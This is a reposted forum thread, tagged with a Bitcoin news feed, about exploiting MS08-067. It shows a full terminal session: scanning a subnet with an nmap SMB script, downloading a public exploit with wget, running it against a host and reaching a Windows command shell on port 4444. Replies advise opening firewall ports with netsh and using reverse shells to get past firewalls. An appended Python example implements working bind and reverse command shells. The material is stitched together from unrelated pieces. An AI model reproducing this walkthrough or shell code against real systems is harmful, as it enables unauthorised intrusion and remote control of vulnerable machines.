ms08-067
b4cktr4ck3 / # svn co --username guest --password "" svn://svn.insecure.org/nmap-exp/ron
b4cktr4ck3 / # cd ron/nmap-smb
b4cktr4ck3 nmap-smb # ./configure
b4cktr4ck3 nmap-smb # make
b4cktr4ck3 nmap-smb # make install
b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse -p 445 192.168.1.0/24
Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
Interesting ports on 192.168.1.127:
PORT STATE SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.128:
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:04:4B:18:69:8A (Nvidia)
Interesting ports on 192.168.1.237:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)
Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067
b4cktr4ck3 / # wget https://ift.tt/2KYZUVk
--13:45:35-- https://ift.tt/2KYZUVk
=> `7132.py'
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
[ <=> ] 7,085 --.--K/s
13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
b4cktr4ck3 / # python 7132.py 192.168.1.237 2
#######################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# https://ift.tt/1mIk0WD
# Email: d3basis.m0hanty @ gmail.com
#######################################################################
[-]Windows 2003[SP2] payload loaded
[-]Initiating connection
[-]connected to ncacn_np:192.168.1.237[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
b4cktr4ck3 / # telnet 192.168.1.237 4444
Trying 192.168.1.237...
Connected to 192.168.1.237.
Escape character is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Are you using bind_tcp?
reverse_tcp should bypass the firewall, but in order to use bind_tcp you have to execute this command first: netsh firewall set portopening TCP 6112, where 6112 is the port listened on by meterpreter. You could do that with, for example, the "Windows Execute Command" payload.
You've got this a bit twisted. A bind_tcp payload will open a socket on the victim box and listen for connections to it. The problem with this is that a host-based firewall may block incoming connections, so that when your "evil hacker" box attempts to connect to the bind_tcp backdoor, its incoming packet is blocked by the firewall and therefore cannot establish a connection with the listening bind_tcp socket.
A reverse_tcp backdoor does the opposite of a bind_tcp. It does not create a local listening socket, it establishes a reverse connection outbound from the victim to whatever IP and port you specified when you created the payload. This technique takes advantage of the fact that most network based firewalls may not allow traffic into the network, but will normally allow outbound traffic without any problem. Especially if your reverse_tcp shell is calling out to a popular port such as port 80 or 443. Also, some host based firewalls will allow these connections even if they are blocking incoming connections (usually because the user got tired of clicking "allow" or "deny" all the time).
For your specific problem, since file and print sharing is turned on, try a reverse_tcp to port TCP/139 of your "evil hacker" box (make sure samba is not running when you do this).
If you want to learn more about reverse_tcp, google for "shoveling a shell". That is the term normally associated with reverse_tcp connections.
-------------------------------
What kind of payload are you using? If it is a simple tcp_backdoor then on the box you just exploited, open a cmd shell, run netstat -an and if you see TCP/4444 listening, then the problem is probably firewall related.
If you are using a reverse_tcp_backdoor, then my guess is that the victim is not allowing the backdoor to install/execute. Try a different payload.
Since you provided no information about your network or victim host setup, this is all I can think of.
------------------------------
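The two replies above describe the difference between bind_tcp and reverse_tcp in words; the following is an added example (not code from either poster and not Metasploit's payloads) that runs both directions over loopback so the difference in who listens and who connects is visible. The single-line command protocol with a "<END>" trailer, the ephemeral ports, and the use of the local /bin/sh in place of cmd.exe are this example's own simplifications. It cannot reproduce a firewall dropping inbound packets; what it shows is that in the reverse case the victim never opens a listening socket at all, which is exactly why an inbound-only filter does not stop it.

```python
"""bind_tcp vs reverse_tcp over loopback: which side listens, which side connects.

Added example with a toy one-line command protocol; each command's output is
followed by a TRAILER so the attacker side knows when it is complete.
"""
import socket
import subprocess
import threading

HOST = "127.0.0.1"
TRAILER = b"<END>\n"


def serve_commands(conn):
    """Victim side: run newline-terminated commands read from conn.

    A real payload hands the socket to cmd.exe; here each line is run with
    the local shell and the session ends on the literal 'exit'.
    """
    with conn, conn.makefile("rb") as rfile:
        for raw in rfile:
            cmd = raw.decode().strip()
            if cmd == "exit":
                break
            out = subprocess.run(cmd, shell=True, capture_output=True).stdout
            conn.sendall(out + TRAILER)


def bind_payload(ready, info):
    """bind_tcp: the VICTIM listens, so the attacker must be able to connect IN.

    Uses an ephemeral port published in info['port']; a real payload binds a
    fixed port such as 4444, which is what a host firewall can block.
    """
    srv = socket.socket()
    srv.bind((HOST, 0))
    srv.listen(1)
    info["port"] = srv.getsockname()[1]
    ready.set()
    conn, _ = srv.accept()
    srv.close()
    serve_commands(conn)


def reverse_payload(host, port):
    """reverse_tcp: the VICTIM connects OUT to the attacker's listener; no local listen()."""
    serve_commands(socket.create_connection((host, port)))


def attacker_session(conn, commands):
    """Attacker side: send each command, collect its output up to the trailer."""
    results = []
    with conn, conn.makefile("rb") as rfile:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            buf = b""
            for line in rfile:
                buf += line
                if buf.endswith(TRAILER):
                    break
            results.append(buf[: -len(TRAILER)].decode().strip())
        conn.sendall(b"exit\n")
    return results


def run_demo():
    """Run both directions over loopback; return what the attacker side saw."""
    seen = {}

    # 1. bind_tcp: victim listens first, attacker connects to the victim's port.
    ready, info = threading.Event(), {}
    victim = threading.Thread(target=bind_payload, args=(ready, info), daemon=True)
    victim.start()
    ready.wait(5)
    seen["bind_tcp"] = attacker_session(
        socket.create_connection((HOST, info["port"])), ["echo bind-ok"])
    victim.join(5)

    # 2. reverse_tcp: attacker (handler) listens first, victim calls out to it.
    handler = socket.socket()
    handler.bind((HOST, 0))
    handler.listen(1)
    port = handler.getsockname()[1]
    victim = threading.Thread(target=reverse_payload, args=(HOST, port), daemon=True)
    victim.start()
    conn, _ = handler.accept()
    handler.close()
    seen["reverse_tcp"] = attacker_session(conn, ["echo reverse-ok", "echo second"])
    victim.join(5)
    return seen


if __name__ == "__main__":
    print(run_demo())
```

On a real target the bind direction is what the "netstat -an ... TCP/4444 listening" check in the thread is probing for: the listener exists on the victim, the attacker just cannot reach it. The reverse direction has nothing to show in netstat until the callback fires, which is why the handler must already be listening before the exploit is sent.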
from BITCOIN NEWS https://ift.tt/2IWAkQd
via Bitcoin News Update
Monday, May 28, 2018